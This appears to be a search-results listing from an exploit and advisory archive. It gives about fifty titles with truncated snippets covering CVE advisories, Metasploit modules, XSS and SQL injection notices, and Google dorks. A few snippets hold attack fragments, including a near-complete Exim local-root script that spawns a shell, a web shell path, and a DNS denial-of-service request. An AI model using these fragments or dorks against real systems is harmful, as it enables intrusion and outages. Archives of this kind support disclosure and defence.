50728 matches found
Sony Smart TV Information Disclosure / File Read
UNCLASSIFIED ADVISORY INFORMATION TITLE: Multiple vulnerabilities in Sony Smart TVs ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/ DATE PUBLISHED: 23/04/2019 AFFECTED VENDORS: Sony RELEASE MODE: Coordinated release CVE: CVE-2019-10886, CVE-2019-11336...
Oracle WebLogic Server Administration Console Handle Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle WebLogic Server Administration Console Handle RCE', 'Description' = %q This module exploits a path traversal and a Java class instantiatio...
moinmoin-dos.txt
=============================================================== !vuln MoinMoin v1.5.9 is prone to multiple remote vulnerabilities. Earlier versions may also be affected. MoinMoin v1.80 is also affected to a lesser extent. Other versions may also be affected...
WordPress Contact Form 7 5.5.6 Cross Site Scripting
Exploit Title: WordPress Plugin Contact Form 7 v5.5.6 - Cross Site Scripting XSS Date: 2022-03-22 Author: Milad karimi Software Link: https://wordpress.org/plugins/contact-form-7 Version: 5.5.6 Tested on: Windows 11 CVE: N/A 1. Description: This plugin creates a Contact Form 7 from any post types...
CoreHTTP 0.5.3.1 Command Execution
MSF Exploit for CoreHTTP CGI Enabled Remote Arbitrary Command Execution CoreHTTP fails to properly sanitize user input before passing it to popen, allowing anyone with a web browser to run arbitrary commands. No CVE for this yet. require 'msf/core' class Metasploit3 'corehttp remote command...
phpizabi-upload.txt
Powered by PHPizabi v0.848b C1 HFP1 remote file upload author: ZoRLu home: www.yildirimordulari.org contact: [email protected] dork: "Powered by PHPizabi v0.848b C1 HFP1" exploit: http://localhost/izabi/system/cache/pictures/idshell.php -first register web site -Create an event on the click an...
Exim 4.84-3 Local Root / Privilege Escalation
!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
VidiScript 1.0.3a Cross Site Scripting
. \ /| | \ \ \ \ | | | | / \ / \ /\ / \ / / / / / \ /\ / \ / / / | | | Y \ / \ | | \ /\ \ \ | | /\ /\ / || || /\ \ /|| / /// \ /|| \ // / / / / / / http://thecrowscrew.org Exploit Title: VidiScript Persistent XSS Vulnerability Author: Gabby Google Dork: Powered By VidiScript...
Cacti 1.2.8 Unauthenticated Remote Code Execution
Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution Metasploit Date: 2020-02-29 Exploit Author: Lucas Amorim sh286s CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: Linux This module requires Metasploit: https://metasploit.com/download Current...
ZTE Mobile Hotspot MS910S Backdoor / Hardcoded Password
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: ZTE mobile Hotspot MS910S vulnerable version: DLMF910SCNEUV1.00.01 fixed version: - CVE number: CVE-2019-3422 impact: High homepage:...
Aerospike Database UDF Lua Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Aerospike Database UDF Lua Code Execution', 'Description' = %q Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to...
CMS Made Simple 2.2.8 Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CMS Made Simple Authenticated RCE via object injection', 'Description' = %q An issue was discovered in CMS Made Simple 2.2.8. In the module...
Tiny File Manager 2.4.6 Shell Upload
Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution RCE Date: 14/03/2022 Exploit Author: FEBIN MON SAJI Software Link: https://github.com/prasathmani/tinyfilemanager Version: Tiny File Manager Example: $0 http://files.ubuntu.local/index.php admin "admin@123" " log-in URL=$1 admin=$2...
Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache 2.4.49/2.4.50 Traversal RCE', 'Description' = %q This module exploit an unauthenticated RCE vulnerability which exists in Apache version...
Dropbear SSHD xauth Command Injection / Bypass
Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 Version: 0.2 Date: Mar 3rd, 2016 Tag: dropbearsshd xauth command injection may lead to forced-command bypass Overview -------- Name: dropbear Vendor: Matt Johnston References: https://matt.ucc.asn.au/dropbear/dropbear.ht...
Apache Struts 2 Remote Code Execution
Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution Google Dork: ext:action | filetype:action Date: 2020/09/09 Exploit Author: Jonatas Fil Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html Version: = 2.3.15 Tested on: Linux CVE : CVE-2013-2251...
Zimbra Collaboration Autodiscover Servlet XXE / ProxyServlet SSRF
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF', 'Description' = %q This module exploits an XML external entity vulnerabilit...
Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include...
SMF 2.0.15 SMF4Mobile 1.1.5 / 1.2 Open Redirection
Exploit Title : SMF 2.0.15 SMF4Mobile 1.1.5/1.2 SMF-Media Open Redirection Author Discovered By : KingSkrupellos Team : Cyberizm Digital Security Army Date : 02/03/2019 Vendor Homepage : simplemachines.org smfhacks.com Software Download Links : download.simplemachines.org/index.php?archive...
Adult Video Script 8.2 File Inclusion
==================================================================================================================================== | Title : Adult Video Script 8.2 RFI /LFI Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 69.032-bit | |...
TP-LINK Cloud Cameras NCXXX Stack Overflow
Vulnerability title: TP-LINK Cloud Cameras NCXXX DelMultiUser Stack Overflow Author: Pietro Oliva CVE: CVE-2020-13224 Vendor: TP-LINK Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450 Affected versions: NC200 = 2.1.10 build 200401, NC210 = 1.0.10 build 200401, NC220 = 1.3.1 build 200401,...
ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass
POC: CVE-2018-7357 and CVE-2018-7358 Disclaimer: This POC is for Educational Purposes , I would Not be responsible for any misuse of the information mentioned in this blog post + Unauthenticated + Author: Usman Saeed usman at xc0re.net + Protocol: UPnP + Affected Harware/Software: Model name: ZXH...
WAGO 852 Industrial Managed Switch Series Code Execution / Hardcoded Credentials
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities product: WAGO 852 Industrial Managed Switch Series vulnerable version: 852-303: v1.2.2.S0 852-1305: v1.1.6.S0 852-1505: v1.1.5.S0 fixed version:...
Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure
Exploit Title: File disclosure in Pulse Secure SSL VPN metasploit Google Dork: inurl:/dana-na/ filetype:cgi Date: 8/20/2019 Exploit Author: 0xDezzy Justin Wagner, Alyssa Herrera Vendor Homepage: https://pulsesecure.net Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before...
WikkaWiki 1.3.2 Code Execution / Shell Upload / SQL Injection
---------------------------------------------------- WikkaWiki Query" 142. UPDATE ".$this-GetConfigValue'tableprefix'."users 143. SET email = '".mysqlrealescapestring$email."', 144. doubleclickedit = '".mysqlrealescapestring$doubleclickedit."', 145. showcomments =...
vBulletin 3.8.4 Zoints SEO 2.3.2 Open Redirection
Exploit Title : vBulletin 3.8.4 Zoints SEO 2.3.2 Computer-Logic Open Redirection Author Discovered By : KingSkrupellos Team : Cyberizm Digital Security Army Date : 01/03/2019 Vendor Homepages : zoints.com computer-logic.org Software Information Links : vbulletin.org/forum/showthread.php?t=127336...
PDF24 Creator 11.15.1 Local Privilege Escalation
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Local Privilege Escalation via MSI installer product: PDF24 Creator geek Software GmbH vulnerable version: =11.15.1 fixed version: 11.15.2 CVE number: CVE-2023-49147...
VidiScript SQL Injection
====================================== VidiScript Sql Injection Vulnerability ====================================== + Title: VidiScript Sql Injection Vulnerability + Date: 23.02.2011 + Author: ThEtA.Nu + Software Link: VidiScript.com + Where : From Remote Founded by : ThEtA.Nu Team: Kosova Hacke...
Microsoft Windows RDP BlueKeep Denial Of Service
Exploit Title: Bluekeep Denial of Service metasploit module Shodan Dork: port:3389 Date: 07/14/2019 Exploit Author: RAMELLA Sebastien https://github.com/mekhalleh/ Vendor Homepage: https://microsoft.com Version: all affected RDP services by cve-2019-0708 Tested on: Windows XP 32-bits / Windows 7...
Moodle 3.x PHP Unserialize Remote Code Execution
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Remote Code Execution via PHP unserialize product: Moodle - Open-source learning platform vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier...
Hikvision IP Camera Unauthenticated Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Hikvision IP Camera Unauthenticated Command Injection', 'Description' = %q This module exploits an unauthenticated command injection in a variety...
boastmachine-sql.txt
boastMachine v3.1 Remote Sql Injection AUTHOR : R3d.W0rm Sina Yazdanmehr Discovered by : R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download : www.boastology.com DORK : Powered by boastMachine v3.1 Bug...
Xenforo 2.2.15 Remote Code Execution
----------------------------------------------------------------------- XenForo = 2.2.15 Template System Remote Code Execution Vulnerability ----------------------------------------------------------------------- - Software Link: https://xenforo.com - Affected Versions: Version 2.2.15 and prior...
Background Intelligent Transfer Service Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', 'Description' = %q This module exploits...
Microsoft Exchange 2019 SSRF / Arbitrary File Write
import requests from urllib3.exceptions import InsecureRequestWarning import random import string import sys def idgeneratorsize=6, chars=string.asciilowercase + string.digits: return ''.joinrandom.choicechars for in rangesize if lensys.argv " print"使用方式: python PoC.py mail.btwaf.cn [email protected]...
Microsoft PlayReady Complete Client Identity Compromise
Hello All, We have come up with two attack scenarios that make it possible to extract private ECC keys used by a PlayReady client Windows SW DRM scenario for the communication with a license server and identity purposes. More specifically, we successfully demonstrated the extraction of the...
RomPager 4.34 Authentication Bypass
Title: Misfortune Cookie Exploit RomPager = 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf Versions...
ag-traverse.txt
netVigilance Security Advisory 13 Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability Description: Advanced Guestbook is a PHP-based guestbook script. It includes many useful features such as preview, templates, e-mail notification, picture upload, page spanning , html tags handlin...
Zyxel Buffer Overflow / File Disclosure / CSRF / XSS / Broken Access Control
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: Multiple Zyxel devices vulnerable version: For affected products see "Solution" section fixed version: see "Solution" section C...
Brocade Fabric OS Remote Code Execution / Information Disclosure
Brocade Fabric OS versions prior to 9.2.2 suffer from 10 vulnerabilities including, but not limited to, remote code execution, information disclosure, man-in-the-middle, weak cryptography, and hardcoded key vulnerabilities. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory Information Titl...
Laravel 10.11 Database Disclosure / Information Disclosure
==================================================================================================================================== | Title : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser ...
JetBrains TeamCity Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'JetBrains TeamCity Unauthenticated Remote Code Execution', 'Description' = %q This module exploits an authentication bypass vulnerability in...
Hikvision IP Camera Information Disclosure
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera', 'Description...
Microsoft SharePoint Unsafe Control And ViewState Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'http://microsoft.com/sharepoint/webpartpages', 'soap' = 'http://www.w3.org/2003/05/soap-envelope', 'xsi' =...
Laravel 9.47.0 Information Disclosure
==================================================================================================================================== | Title : Laravel from Version 1.0 to 9.47.0 MySQL Credential Disclosure Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser :...
WordPress Contact-Form-7 5.1.6 Cross Site Scripting
Title : word press plugin contact-form-7 5.1.6 - Cross-Site Scripting - Author : mehran feizi - Vendor : https://wordpress.org/plugins/contact-form-7/ - Tested on : Windows - Category : Webapps - Date : 2020-02-17...
SquirrelMail 1.4.22 Remote Code Execution
/ / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // Follow @dawidgolunski ExploitBox.io Interested in security / vulns / exploits ? Check out the new project of the author of this advisory: ExploitBox.io A Playground &...
BIND TSIG Denial Of Service
!/usr/bin/python coding:utf-8 from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT tsig = DNSRRTSIGrrname="local-ddns", algoname="hmac-sha256", rclass=255, maclen=0, macdata="", timesigned=0, fudge=300, error=16 dnsreq = IPdst='127.0.0.1'/UDPdport=53/DNSrd=1, ad=1,...
Comsenz SupeSite CMS 7.0 Cross Site Scripting
Comsenz SupeSite CMS 7.0 Stored XSS Cross-site Scripting Security Vulnerabilities Exploit Title: Comsenz SupeSite CMS 7.0 Stored XSS Security Vulnerabilities Product: Supesite CMS Content Management System Vendor: ComSenz Vulnerable Versions: 6.0.1UC 7.0 Tested Version: 7.0 Advisory Publication:...
Trojan.Win32 BankShot MVID-2024-0669 Buffer Overflow
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/f2fd6a7b400782bb43499e722fb62cf4.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32 BankShot Vulnerability: Remote Stack Buffer Overflow SEH Description: The...